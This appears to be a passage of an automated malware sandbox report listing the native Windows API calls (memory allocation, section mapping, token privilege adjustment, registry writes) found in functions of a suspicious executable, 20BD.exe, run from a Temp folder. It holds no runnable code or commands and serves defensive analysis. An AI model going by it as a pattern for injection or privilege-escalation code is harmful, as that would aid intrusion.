Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_004017DA Sleep,NtTerminateProcess,	20_2_004017DA
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_004017F8 NtTerminateProcess,	20_2_004017F8
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_0040209A NtQuerySystemInformation,	20_2_0040209A
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_004017A3 Sleep,NtTerminateProcess,	20_2_004017A3
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABA98C0 ZwDuplicateObject,LdrInitializeThunk,	20_2_6ABA98C0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABA9820 ZwEnumerateKey,LdrInitializeThunk,	20_2_6ABA9820
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABA9860 ZwQuerySystemInformation,LdrInitializeThunk,	20_2_6ABA9860
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABA99A0 ZwCreateSection,LdrInitializeThunk,	20_2_6ABA99A0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABA9600 ZwOpenKey,LdrInitializeThunk,	20_2_6ABA9600
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABA967A NtQueryInformationProcess,LdrInitializeThunk,	20_2_6ABA967A
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABA9660 ZwAllocateVirtualMemory,LdrInitializeThunk,	20_2_6ABA9660
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABA9780 ZwMapViewOfSection,LdrInitializeThunk,	20_2_6ABA9780
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB9E2BB ZwWaitForAlertByThreadId,	20_2_6AB9E2BB
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABA9AB0 ZwWaitForMultipleObjects,	20_2_6ABA9AB0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB652A5 RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwFsControlFile,RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,ZwClose,RtlFreeHeap,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,ZwClose,RtlFreeHeap,RtlEnterCriticalSection,RtlLeaveCriticalSection,	20_2_6AB652A5
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB61AA0 RtlAllocateHandle,RtlReAllocateHeap,ZwAllocateVirtualMemory,ZwAllocateVirtualMemory,RtlAllocateHeap,	20_2_6AB61AA0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB95AA0 TpSetPoolMaxThreads,ZwSetInformationWorkerFactory,RtlGetCurrentServiceSessionId,TpSetPoolMaxThreads,	20_2_6AB95AA0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC38ADD RtlGetCurrentServiceSessionId,ZwTraceEvent,	20_2_6AC38ADD
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB6429E RtlInitUnicodeString,ZwClose,LdrQueryImageFileKeyOption,	20_2_6AB6429E
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABAAA90 ZwQuerySystemInformationEx,	20_2_6ABAAA90
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB9D294 ZwQueryAttributesFile,RtlFreeHeap,ZwClose,RtlFreeHeap,	20_2_6AB9D294
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB82280 RtlAcquireSRWLockExclusive,RtlDllShutdownInProgress,ZwWaitForAlertByThreadId,RtlAcquireSRWLockExclusive,ZwTerminateProcess,	20_2_6AB82280
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABAB280 ZwWow64DebuggerCall,	20_2_6ABAB280
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABAAAF0 ZwRaiseHardError,	20_2_6ABAAAF0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABAAAE0 ZwRaiseException,	20_2_6ABAAAE0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABA9AE0 ZwTraceEvent,	20_2_6ABA9AE0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB8FAD0 RtlAcquireSRWLockShared,RtlDllShutdownInProgress,ZwWaitForAlertByThreadId,RtlAcquireSRWLockShared,ZwTerminateProcess,	20_2_6AB8FAD0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABF1AD6 ZwFreeVirtualMemory,	20_2_6ABF1AD6
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABAAAC0 ZwQueryWnfStateNameInformation,	20_2_6ABAAAC0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB9B230 EtwEventWrite,ZwTraceEvent,RtlNtStatusToDosError,EtwEventWrite,	20_2_6AB9B230
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB68239 RtlInitUnicodeStringEx,ZwQueryValueKey,RtlInitUnicodeStringEx,RtlPrefixUnicodeString,ZwEnumerateKey,ZwOpenKey,RtlInitUnicodeStringEx,ZwQueryValueKey,RtlFreeHeap,ZwClose,RtlAllocateHeap,RtlCompareUnicodeString,ZwClose,RtlFreeHeap,ZwClose,	20_2_6AB68239
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB8A229 ZwAllocateVirtualMemory,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,ZwQueryVirtualMemory,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlFillMemoryUlong,DbgPrint,DbgPrint,DbgPrint,	20_2_6AB8A229
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB64A20 RtlGetCurrentServiceSessionId,RtlFreeHeap,ZwClose,RtlReleaseActivationContext,LdrUnloadDll,	20_2_6AB64A20
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABAAA20 ZwQuerySecurityAttributesToken,	20_2_6ABAAA20
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC38A62 RtlGetCurrentServiceSessionId,ZwTraceEvent,	20_2_6AC38A62
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB65210 RtlGetCurrentDirectory_U,memcpy,RtlGetCurrentDirectory_U,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,	20_2_6AB65210
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABA9A00 ZwProtectVirtualMemory,	20_2_6ABA9A00
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC38214 RtlAcquireSRWLockExclusive,ZwSetInformationWorkerFactory,RtlReleaseSRWLockExclusive,	20_2_6AC38214
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB69240 ZwClose,ZwClose,RtlFreeHeap,RtlFreeHeap,RtlFreeHeap,RtlAcquireSRWLockExclusive,RtlFreeHeap,	20_2_6AB69240
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABF1242 ZwUnmapViewOfSection,ZwClose,ZwClose,ZwClose,ZwClose,ZwClose,	20_2_6ABF1242
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB94BAD RtlAcquireSRWLockExclusive,memset,ZwTraceControl,RtlReleaseSRWLockExclusive,RtlSetLastWin32Error,RtlFreeHeap,RtlAllocateHeap,RtlNtStatusToDosError,RtlFreeHeap,	20_2_6AB94BAD
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABAA3A0 ZwGetCompleteWnfStateSubscription,	20_2_6ABAA3A0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB62B93 TpSetDefaultPoolMaxThreads,ZwDuplicateToken,	20_2_6AB62B93
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB9939F RtlInitializeCriticalSectionEx,ZwDelayExecution,	20_2_6AB9939F
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABAA390 ZwGetCachedSigningLevel,	20_2_6ABAA390
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB623F6 ZwClose,RtlFreeHeap,	20_2_6AB623F6
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC2138A memset,RtlGetCurrentServiceSessionId,ZwTraceEvent,	20_2_6AC2138A
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABA9BF0 ZwAlertThreadByThreadId,	20_2_6ABA9BF0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC21BA8 RtlGetCurrentServiceSessionId,ZwTraceEvent,	20_2_6AC21BA8
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB62BC2 ZwOpenThreadToken,ZwSetInformationThread,ZwClose,	20_2_6AB62BC2
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC38BB6 RtlGetCurrentServiceSessionId,ZwTraceEvent,	20_2_6AC38BB6
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC39BBE RtlGetCurrentServiceSessionId,ZwTraceEvent,	20_2_6AC39BBE
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB69335 ZwClose,ZwClose,	20_2_6AB69335
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC38B58 RtlGetCurrentServiceSessionId,ZwTraceEvent,	20_2_6AC38B58
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC16369 RtlInitUnicodeString,ZwOpenFile,ZwCreateSection,ZwMapViewOfSection,ZwClose,ZwClose,	20_2_6AC16369
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB64B00 TpCallbackMayRunLong,TpCallbackMayRunLong,ZwSetInformationWorkerFactory,	20_2_6AB64B00
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABA9B00 ZwSetValueKey,	20_2_6ABA9B00
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB95306 ZwReleaseKeyedEvent,	20_2_6AB95306
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB93B7A RtlAllocateHeap,ZwQuerySystemInformationEx,memset,RtlFreeHeap,	20_2_6AB93B7A
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB62B7E ZwSetInformationThread,ZwClose,	20_2_6AB62B7E
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABAAB70 ZwReleaseWorkerFactoryWorker,	20_2_6ABAAB70
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABF8372 ZwClose,RtlStringFromGUIDEx,ZwCreateKey,RtlFreeUnicodeString,	20_2_6ABF8372
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC2131B RtlGetCurrentServiceSessionId,ZwTraceEvent,	20_2_6AC2131B
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABAAB60 ZwReleaseKeyedEvent,	20_2_6ABAAB60
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABE7365 RtlRunOnceExecuteOnce,ZwQuerySystemInformation,RtlCaptureContext,memset,RtlReportException,	20_2_6ABE7365
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB76B6B ZwQueryAttributesFile,RtlDeleteBoundaryDescriptor,	20_2_6AB76B6B
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB93B48 ZwClose,ZwClose,	20_2_6AB93B48
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB918B9 ZwCreateTimer2,ZwCreateWaitCompletionPacket,ZwAssociateWaitCompletionPacket,ZwClose,	20_2_6AB918B9
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB9F0BF ZwOpenFile,RtlFreeHeap,ZwQueryVolumeInformationFile,RtlAllocateHeap,memcpy,ZwClose,ZwClose,RtlFreeHeap,	20_2_6AB9F0BF
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABAB0B0 ZwTraceControl,	20_2_6ABAB0B0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB8F0AE ZwSetInformationWorkerFactory,	20_2_6AB8F0AE
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB8E090 RtlWow64EnableFsRedirectionEx,RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwSetEvent,	20_2_6AB8E090
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABAA890 ZwQueryDebugFilterState,	20_2_6ABAA890
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABA9890 ZwFsControlFile,	20_2_6ABA9890
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABA108B ZwClose,	20_2_6ABA108B
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB63880 TpSetWaitEx,RtlAllocateHeap,ZwGetCompleteWnfStateSubscription,RtlFreeHeap,TpSetWaitEx,	20_2_6AB63880
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABE3884 ZwQueryValueKey,RtlAllocateHeap,ZwQueryValueKey,RtlFreeHeap,	20_2_6ABE3884
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB6B8F0 TpSetPoolStackInformation,ZwSetInformationWorkerFactory,	20_2_6AB6B8F0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB780FC RtlEqualUnicodeString,ZwMapViewOfSection,ZwUnmapViewOfSection,LdrQueryImageFileKeyOption,RtlAcquirePrivilege,RtlReleasePrivilege,	20_2_6AB780FC
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB640FD RtlImageNtHeaderEx,DbgPrintEx,memset,RtlDebugPrintTimes,DbgPrintEx,wcsstr,DbgPrintEx,DbgPrintEx,wcschr,DbgPrintEx,ZwSetInformationProcess,	20_2_6AB640FD
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC160A2 ZwQueryInformationFile,	20_2_6AC160A2
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABAA0D0 ZwCreateTimer2,	20_2_6ABAA0D0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABA98D0 ZwQueryAttributesFile,	20_2_6ABA98D0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABA10D7 ZwOpenKey,ZwCreateKey,	20_2_6ABA10D7
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABFB8D0 RtlAcquirePrivilege,RtlAllocateHeap,ZwSetInformationThread,RtlImpersonateSelfEx,ZwOpenProcessTokenEx,ZwAdjustPrivilegesToken,RtlAllocateHeap,ZwAdjustPrivilegesToken,RtlFreeHeap,RtlFreeHeap,ZwClose,ZwSetInformationThread,ZwClose,RtlFreeHeap,	20_2_6ABFB8D0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB670C0 ZwClose,RtlFreeHeap,RtlFreeHeap,	20_2_6AB670C0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABA00C2 ZwAlertThreadByThreadId,	20_2_6ABA00C2
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABA9830 ZwOpenFile,	20_2_6ABA9830
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB94020 RtlGetVersion,RtlGetSuiteMask,RtlGetNtProductType,RtlInitUnicodeString,ZwQueryLicenseValue,RtlGetSuiteMask,RtlGetVersion,	20_2_6AB94020
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC38858 ZwAlertThreadByThreadId,	20_2_6AC38858
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB6F018 RtlAllocateHeap,ZwQueryValueKey,memcpy,RtlFreeHeap,	20_2_6AB6F018
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABA9800 ZwOpenProcessTokenEx,	20_2_6ABA9800
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABF1879 ZwAllocateVirtualMemory,memset,RtlInitializeSid,	20_2_6ABF1879
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB7106F ZwOpenKey,ZwClose,	20_2_6AB7106F
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC3F019 RtlInitUnicodeString,RtlInitUnicodeString,ZwQueryValueKey,RtlAllocateHeap,ZwQueryValueKey,RtlInitUnicodeString,ZwClose,RtlFreeHeap,	20_2_6AC3F019
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB65050 RtlSetCurrentDirectory_U,RtlAllocateHeap,RtlFreeHeap,RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,RtlSetCurrentDirectory_U,RtlFreeHeap,RtlFreeHeap,	20_2_6AB65050
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABA9840 ZwDelayExecution,	20_2_6ABA9840
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB919B8 RtlEnterCriticalSection,RtlLeaveCriticalSection,RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwWaitForSingleObject,RtlQueryInformationActiveActivationContext,RtlQueryInformationActivationContext,	20_2_6AB919B8
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABAA9B0 ZwQueryLicenseValue,	20_2_6ABAA9B0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABAB1A0 ZwWaitForKeyedEvent,	20_2_6ABAB1A0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC389E7 RtlGetCurrentServiceSessionId,ZwTraceEvent,	20_2_6AC389E7
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB6519E RtlEqualUnicodeString,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,	20_2_6AB6519E
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABA9990 ZwQueryVolumeInformationFile,	20_2_6ABA9990
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABA9980 ZwCreateEvent,	20_2_6ABA9980
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABAB180 ZwWaitForAlertByThreadId,	20_2_6ABAB180
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB8C182 RtlGetCurrentServiceSessionId,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwWaitForAlertByThreadId,RtlAcquireSRWLockExclusive,	20_2_6AB8C182
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC2A189 RtlAcquireSRWLockExclusive,ZwGetNlsSectionPtr,RtlAllocateHeap,RtlFreeHeap,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,	20_2_6AC2A189
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC249A4 ZwAllocateVirtualMemory,RtlCompareMemory,memcpy,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,	20_2_6AC249A4
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABF19C8 ZwCreateSection,ZwMapViewOfSection,memset,ZwUnmapViewOfSection,ZwClose,	20_2_6ABF19C8
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABF193B ZwRaiseException,ZwTerminateProcess,	20_2_6ABF193B
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABAA130 ZwCreateWaitCompletionPacket,	20_2_6ABAA130
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB84120 RtlAllocateHeap,memmove,memmove,RtlPrefixUnicodeString,RtlAllocateHeap,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,RtlFreeHeap,	20_2_6AB84120
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABA9920 ZwDuplicateToken,	20_2_6ABA9920
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC38966 RtlGetCurrentServiceSessionId,ZwTraceEvent,	20_2_6AC38966
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABA9910 ZwAdjustPrivilegesToken,	20_2_6ABA9910
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB69100 TpReleasePool,RtlAcquireSRWLockExclusive,ZwShutdownWorkerFactory,RtlGetCurrentServiceSessionId,TpReleasePool,TpReleasePool,RtlDebugPrintTimes,TpReleasePool,	20_2_6AB69100
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB70100 LdrUnloadAlternateResourceModuleEx,RtlAcquireSRWLockExclusive,ZwUnmapViewOfSection,ZwClose,LdrUnloadAlternateResourceModuleEx,RtlFreeHeap,RtlFreeHeap,RtlReAllocateHeap,	20_2_6AB70100
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABA9900 ZwOpenEvent,	20_2_6ABA9900
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB6B171 ZwQueryDebugFilterState,_alloca_probe_16,memcpy,_vsnprintf,ZwWow64DebuggerCall,RtlRaiseException,	20_2_6AB6B171
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABF1976 ZwCreateEvent,	20_2_6ABF1976
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABE3971 ZwOpenKeyEx,	20_2_6ABE3971
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABAB160 ZwUpdateWnfStateData,	20_2_6ABAB160
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABAA160 ZwCreateWorkerFactory,	20_2_6ABAA160
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB6395E RtlAcquireSRWLockShared,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockShared,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockShared,RtlReleaseSRWLockExclusive,RtlFreeHeap,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwGetCompleteWnfStateSubscription,RtlFreeHeap,	20_2_6AB6395E
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABAB150 ZwUnsubscribeWnfStateChange,	20_2_6ABAB150
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC3F13B ZwOpenKey,ZwCreateKey,	20_2_6AC3F13B
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB8B944 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,RtlGetCurrentServiceSessionId,ZwSetTimer2,RtlGetCurrentServiceSessionId,ZwCancelTimer2,	20_2_6AB8B944
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB8E6B0 RtlSetThreadWorkOnBehalfTicket,memcmp,ZwSetInformationThread,RtlSetThreadWorkOnBehalfTicket,	20_2_6AB8E6B0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC38ED6 RtlGetCurrentServiceSessionId,ZwTraceEvent,	20_2_6AC38ED6
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABA9EA0 ZwCompareSigningLevels,	20_2_6ABA9EA0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABF2EA3 RtlGetCurrentServiceSessionId,ZwTraceEvent,	20_2_6ABF2EA3
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB9DE9E RtlAcquireSRWLockExclusive,RtlAcquireSRWLockExclusive,RtlGetCurrentServiceSessionId,ZwUnsubscribeWnfStateChange,RtlReleaseSRWLockExclusive,RtlFreeHeap,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlFreeHeap,	20_2_6AB9DE9E
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB62E9F ZwCreateEvent,ZwClose,	20_2_6AB62E9F
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABAA690 ZwOpenKeyEx,	20_2_6ABAA690
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB63E80 RtlSetThreadSubProcessTag,RtlGetCurrentServiceSessionId,RtlSetThreadSubProcessTag,RtlGetCurrentServiceSessionId,ZwTraceEvent,	20_2_6AB63E80
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB8E6F9 ZwAlpcSetInformation,	20_2_6AB8E6F9
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABF16FA ZwQueryWnfStateNameInformation,ZwUpdateWnfStateData,EtwEventWriteNoRegistration,	20_2_6ABF16FA
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB6B6F0 EtwEventWriteNoRegistration,ZwTraceEvent,RtlNtStatusToDosError,	20_2_6AB6B6F0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABBDEF0 RtlRaiseException,RtlCaptureContext,ZwRaiseException,RtlRaiseStatus,	20_2_6ABBDEF0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABA96E0 ZwFreeVirtualMemory,	20_2_6ABA96E0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC1BE9B RtlAcquireSRWLockExclusive,ZwAllocateVirtualMemory,RtlReleaseSRWLockExclusive,	20_2_6AC1BE9B
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABEA6DE ZwRaiseHardError,	20_2_6ABEA6DE
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB666D4 RtlInitUnicodeString,ZwQueryValueKey,	20_2_6AB666D4
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB99ED0 RtlReleaseSRWLockExclusive,RtlReleaseSRWLockShared,RtlAcquireSRWLockExclusive,RtlAcquireSRWLockShared,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockShared,ZwWaitForAlertByThreadId,	20_2_6AB99ED0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABA96D0 ZwCreateKey,	20_2_6ABA96D0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB62ED8 ZwWaitForAlertByThreadId,ZwWaitForAlertByThreadId,	20_2_6AB62ED8
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABA96C0 ZwSetInformationProcess,	20_2_6ABA96C0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC33EBC ZwTraceControl,RtlNtStatusToDosError,RtlSetLastWin32Error,	20_2_6AC33EBC
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB6B630 ZwWaitForKeyedEvent,	20_2_6AB6B630
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABA9E30 ZwCancelWaitCompletionPacket,	20_2_6ABA9E30
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABA9E20 ZwCancelTimer2,	20_2_6ABA9E20
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABA2E1C RtlInitializeCriticalSectionEx,ZwDelayExecution,	20_2_6ABA2E1C
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABF2E14 RtlGetCurrentServiceSessionId,ZwTraceEvent,	20_2_6ABF2E14
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB6C600 LdrQueryImageFileKeyOption,RtlInitUnicodeStringEx,ZwQueryValueKey,LdrQueryImageFileKeyOption,RtlFreeHeap,RtlAllocateHeap,ZwQueryValueKey,RtlFreeHeap,RtlUnicodeStringToInteger,memcpy,	20_2_6AB6C600
